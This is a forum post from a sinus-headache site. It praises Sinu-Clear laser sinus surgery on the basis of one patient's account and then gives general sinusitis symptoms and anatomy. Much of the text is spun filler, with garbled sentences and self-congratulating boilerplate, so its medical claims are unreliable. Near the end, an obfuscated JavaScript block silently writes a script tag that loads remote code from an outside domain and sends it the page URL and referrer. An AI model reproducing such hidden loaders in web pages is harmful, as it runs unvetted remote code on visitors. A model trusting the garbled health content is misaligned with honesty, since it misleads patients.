sinus tip

All you ever wanted to know about sinus headache

You are not connected. Please login or register

Sinus Laser Surgery "Changed My Life" Said One Patient

Go down  Message [Page 1 of 1]

Admin

Admin

Sinus

Gentleman named Jason contacted me and said he recently had sinus laser surgery from Dr. Harvey Paley, whose practice is in Beverly Hills, CA. He said flatly that this operation 'changed my life'. This gentleman has had 3 other conventional surgeries in the past 15 years during which time he had lost his sense of smell and sense of taste. Hearing about such a success after a sinus operation is rare in my experience. I personally have had two of them, and they basically didn't work, since I continued to get rid of sinus infections forever both of them. In fact, I've heard of very few people who have had sinus surgery and who were pleased about the results over time.

This Type of Approach Seems to Make Perfect Sense

That is, using laser and endoscope technology to limit bleeding and see clearly what is being operated on. The first question I had is 'why are there only a small handful of surgeons in the U.S. doing this operation?' It is not brand new, and in fact this laser sinus surgery was apparently pioneered by Dr. Daniel M. Schuman from Boca Raton, Florida over 10 years ago. Apparently Dr. Schuman has subsequently retired from his medical practice. It is always better to have compositions with as little corrections in it as possible. This is why we have written this composition avoiding sinus surgical treatment with alternative treatments no corrections for the reader to be more interested in reading it.

Addition to Dr

Paley in Beverly Hills, CA, I found out about two other otolaryngologists who perform the Sinu-Clear sinus laser operation. One is Dr. Vincent Pisciotta in Biloxi, Mississippi, and the other is Dr. Robert Bonham in Dallas, Texas. Dr. Bonham also performs another new operation called Sinuplasty, which is similar to angioplasty but for the sinus cavities. I understand there may be a few other surgeons in the country who routinely perform the Sinu-Clear operation, and I intend to continue to research this and get the word out. Results will be posted on the blog and forum at ***** I only wish I had heard about this sinus laser surgery procedure years ago. It sounds like it might have been more effective and certainly less painful than the operations I did have. If you are considering being one of the 300,000 people who have sinus operations in the U.S. alone, this procedure is certainly something to know about and consider as an option, even if it were to require travel.

Asked this question to a gentleman from the company that produces the Sinu-Clear laser equipment, a company called PhotoMedex. He said there are many reasons for so few surgeons using the procedure, and most seem to boil down to the reluctance of people, in this case sinus surgeons, to change. In fact PhotoMedex is emphasizing different product lines of medical laser equipment, and the gentleman I spoke with was not optimistic about growth aspects for this procedure. To me this is certainly a shame. I personally have only spoken to one person, Jason, who has undergone the procedure, but he is extremely enthusiastic. I hope to speak to others and get more inputs. I can only say that when someone who has had 3 other operations tries sinus laser surgery and says he has finally regained his sense of smell again after 15 years, then this is worth taking note of, at the very least. The presentation of an article on Sinus Treatment plays an important role in getting the reader interested in reading it. This is the reason for this presentation, which has gotten you interested in reading it!

So when someone is as enthusiastic about his operation as Jason is, it is time to listen, especially considering his background of sinus problems. The operational procedure is called Sinu-Clear, and it uses a laser as well as an endoscope. The laser equipment also provides a steady stream of salt water to flow through the nasal passageways while the operation is taking place. There is apparently very little bleeding during the procedure, since the laser cauterizes the tissue being operated on. Because of this there is no need for nasal packing, and this is a huge positive, as those of us who have gone through a conventional operation with a scalpel and had our noses packed can attest. For me it was just awful. The endoscope allows for good viewing by the surgeon, as the camera projects a picture of the nasal cavities being worked on onto a television screen. It is rather interesting to note that people like reading about Sinus if they are presented in an easy and clear way. The presentation of an article too is important for one to entice people to read it! Laughing

People usually think of a cold when having those regular symptoms; hardly when the headaches become unbearable they see a doctor and find out they suffer from sinusitis. How to achieve sinusitis relief is simple and clear an inflammation of the sinus cavities, the symptoms are always worse than you expect and people spend millions every year trying to relief the symptoms.

Sinusitis pains have different characteristics depending on the involved sinus; a general type of pain is the one coming up in the morning when you get off bed. Aches caused by bending the head forward are specific for frontal sinusitis; pains in the upper teeth, upper maxilla and cheeks are signs for maxillary sinus infection. The ethmoidal sinusitis causes pain between the eyes and swollen eyelids, loss of the smell and airless nose. Sphenoid sinus infection is a more rare condition and gives deeper pains in the head, earaches and pain in the neck. Aiming high is our motto when writing about any topic. In this way, we tend to add whatever matter there is about Sinuses, rather than drop any topic.

General Symptoms of Sinus Inflammation are:

1. Fever 2. Nasal congestion or runny nose 3. Loss of physical strength 4. Bad cough attacks especially at night We are satisfied with this end product on Acute Sinusitis. It was really worth the hard work and effort in writing so much on Acute Sinusitis.

Sinuses are small air cavities located around the nose, known as Para nasal sinuses, situated inside the head bones. The frontal sinus lies right up the eyes in the brow area, the maxillary sinuses are inside the cheekbones, the ethmoid sinus is localized between the eyes and behind it, and the sphenoid sinus lies behind the eyes in the upper region. Enhancing your vocabulary is our intention with the writing of this article on Sinusitis Causes. We have used new and interesting words to achieve this.

Patient Who Had Undergone Endoscopic Sinus Surgery Suffered

Sinus Laser Surgery "Changed My Life" Said One Patient F-a-e-z5

Larynx Irritation Because of the Mucus Drainage to the Back of the Throat

Bacteria and viruses entering the nasal passages with the breathe air cause most of sinusitis cases. The human body reacts agnes scott college and flues caused by these organisms by secreting a higher quantity of mucus which will eventually be trapped inside the sinus cavities together with air. Immunity cells called leucocytes get there firs and cause the nasal congestion and the swelling of the membrane lining. When the nasal passages are blocked, infection develops as bacteria specific to the respiratory tract multiply and become destructive. We have not included any imaginary or false information on Frontal Sinus here. Everything here is true and up to the mark!

Every sinus cavity is connected with the nasal passages through a membrane layer which can get inflamed, and with the nose for air and mucus exchange. Inflammation together with sinus obstruction and secretions blocked inside the sinuses lead to an increased pressure and to the apparition of powerful headaches. Sinus attacks can also be caused by the swollen membrane that blocks air from going into the air passages. Using our imagination has helped us create a wonderful article on Sinus Cavities. Being imaginative is indeed very important when writing about Sinus Cavities!

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

https://sanfordhenry.forumotion.com

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum